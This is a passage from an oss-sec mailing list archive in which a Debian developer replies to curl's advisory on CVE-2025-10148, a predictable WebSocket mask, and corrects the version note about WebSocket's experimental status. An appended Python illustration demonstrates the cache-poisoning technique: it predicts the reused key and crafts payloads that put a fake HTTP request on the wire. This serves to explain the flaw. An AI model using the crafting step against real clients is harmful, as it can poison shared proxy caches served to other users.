oss-sec mailing list archives
Re: [SECURITY ADVISORY] curl: CVE-2025-10148: predictable WebSocket mask
From: Emilio Pozuelo Monfort <pochu27 () gmail com>
Date: Wed, 10 Sep 2025 14:18:50 +0200
Hi Daniel,

On 10/09/2025 07:54, Daniel Stenberg wrote:
> predictable WebSocket mask
> ==========================
>
> Project curl Security Advisory, September 10 2025 -
> [Permalink](https://curl.se/docs/CVE-2025-10148.html)
>
> VULNERABILITY
> -------------
>
> curl's websocket code did not update the 32 bit mask pattern for each new
> outgoing frame as the specification says. Instead it used a fixed mask that
> persisted and was used throughout the entire connection.
>
> A predictable mask pattern allows for a malicious server to induce traffic
> between the two communicating parties that could be interpreted by an
> involved proxy (configured or transparent) as genuine, real, HTTP traffic
> with content and thereby poison its cache. That cached poisoned content
> could then be served to all users of that proxy.
>
> INFO
> ----
>
> This exact scenario is warned about in the security section of the
> WebSocket RFC 6455 and is the very reason the mask should be updated for
> every outgoing frame.
>
> For this bug to become a real-life problem, the libcurl-using application
> must be communicating through such a (defective) proxy that confuses a
> WebSocket communication for HTTP traffic.
>
> Further, to trigger the problem it requires the traffic to be done using
> clear text HTTP / WebSocket (`ws://`) and not over TLS (`wss://`).
>
> The Common Vulnerabilities and Exposures (CVE) project has assigned the
> name CVE-2025-10148 to this issue.
>
> CWE-340: Generation of Predictable Numbers or Identifiers
>
> Severity: Low
>
> AFFECTED VERSIONS
> -----------------
>
> - Affected versions: curl 7.86.0 to and including 8.15.0
> - Not affected versions: curl < 7.86.0 and >= 8.16.0
> - Introduced-in: https://github.com/curl/curl/commit/d78e129d50b2d1
>
> WebSocket was considered experimental before 7.86.0 and therefore we do
> not consider earlier versions vulnerable.
From what I can see, websocket support was introduced in 7.86 in [1], and later marked as supported/not-experimental in 8.11 [2]. If so, I think the above note (also in [3]) should say that it was experimental before 8.11.
Cheers,
Emilio

[1] https://github.com/curl/curl/commit/664249d095275e
[2] https://github.com/curl/curl/commit/d78e129d50b2d1
[3] https://curl.se/docs/CVE-2025-10148.html
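The mechanism the quoted advisory refers to, as an added illustration that is not part of the thread and not curl's code: a small model of RFC 6455 client-side masking, a client with the vulnerable "one masking key per connection" policy beside one that draws a fresh key per frame, and the server-side step that turns key reuse into attacker-chosen wire bytes. The request-looking `POISON` string, the `Client` model and the `attack` helper are constructed for this example; whether a real proxy would actually cache what it sees is the separate "defective proxy" condition the advisory describes, which this code does not model.

```python
"""Why a predictable WebSocket mask matters (added example, not curl code).

RFC 6455 section 5.3 requires the client to XOR every outgoing payload with
a fresh 32-bit masking key so that an attacker-controlled server cannot pick
the bytes that appear on the wire. If the key is reused for the whole
connection, the server learns it from the first frame (the key is sent in
the clear) and can then hand the application a payload whose masked form is
any byte string it likes, e.g. something a naive proxy parses as an HTTP
request.
"""
import os
import struct


def mask_payload(payload: bytes, key: bytes) -> bytes:
    """RFC 6455 masking transform: XOR each byte with the 4-byte key, cycled.
    XOR is an involution, so the same function also unmasks."""
    if len(key) != 4:
        raise ValueError("masking key must be 4 bytes")
    return bytes(b ^ key[i % 4] for i, b in enumerate(payload))


def build_client_frame(payload: bytes, key: bytes, opcode: int = 0x2) -> bytes:
    """One FIN client->server frame with the MASK bit set (7/16/64-bit lengths)."""
    header = bytes([0x80 | (opcode & 0x0F)])
    n = len(payload)
    if n < 126:
        header += bytes([0x80 | n])
    elif n < 65536:
        header += bytes([0x80 | 126]) + struct.pack("!H", n)
    else:
        header += bytes([0x80 | 127]) + struct.pack("!Q", n)
    return header + key + mask_payload(payload, key)


def masking_key_from_frame(frame: bytes) -> bytes:
    """What the server (or anyone on path) sees: the key travels unencrypted."""
    n = frame[1] & 0x7F
    off = 2 + (2 if n == 126 else 8 if n == 127 else 0)
    return frame[off:off + 4]


def craft_payload(target: bytes, predicted_key: bytes) -> bytes:
    """Attacker step: payload = target XOR key, so masked bytes == target."""
    return mask_payload(target, predicted_key)


# Constructed for this example: bytes a confused proxy might treat as a request.
POISON = b"GET /poison.js HTTP/1.1\r\nHost: victim.example\r\n\r\n"


class Client:
    """Hypothetical client model; `key_source` is the masking-key policy."""

    def __init__(self, key_source):
        self.key_source = key_source

    def send(self, payload: bytes) -> bytes:
        return build_client_frame(payload, self.key_source())


def fixed_key_client(key: bytes = b"\xde\xad\xbe\xef") -> Client:
    """Vulnerable policy: the same key reused for every frame on the connection."""
    return Client(lambda: key)


def fresh_key_client(rng=os.urandom) -> Client:
    """Correct policy: a new unpredictable key for every outgoing frame."""
    return Client(lambda: rng(4))


def attack(client: Client, target: bytes = POISON) -> bool:
    """Server reads the key from frame 1, then has the application send a
    payload crafted for that key. True if `target` appears verbatim in the
    second frame as it goes over the wire."""
    first = client.send(b"hello")
    predicted = masking_key_from_frame(first)
    second = client.send(craft_payload(target, predicted))
    return target in second


if __name__ == "__main__":
    print("fixed key, target on the wire:", attack(fixed_key_client()))
    print("fresh key, target on the wire:", attack(fresh_key_client()))
```

Against `fixed_key_client()` the second frame carries `POISON` byte for byte; against `fresh_key_client()` the crafted payload is XORed with a key the server did not predict, so the target only survives if the new key happens to equal the old one (probability 2^-32 per frame), which is exactly the property the per-frame key is meant to provide. Note that this only helps over `ws://`; over `wss://` the proxy never sees the frame bytes in the first place.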
Current thread:
- [SECURITY ADVISORY] curl: CVE-2025-10148: predictable WebSocket mask Daniel Stenberg (Sep 09)
- Re: [SECURITY ADVISORY] curl: CVE-2025-10148: predictable WebSocket mask Emilio Pozuelo Monfort (Sep 10)
- Re: [SECURITY ADVISORY] curl: CVE-2025-10148: predictable WebSocket mask Daniel Stenberg (Sep 10)
- Re: [SECURITY ADVISORY] curl: CVE-2025-10148: predictable WebSocket mask Emilio Pozuelo Monfort (Sep 10)
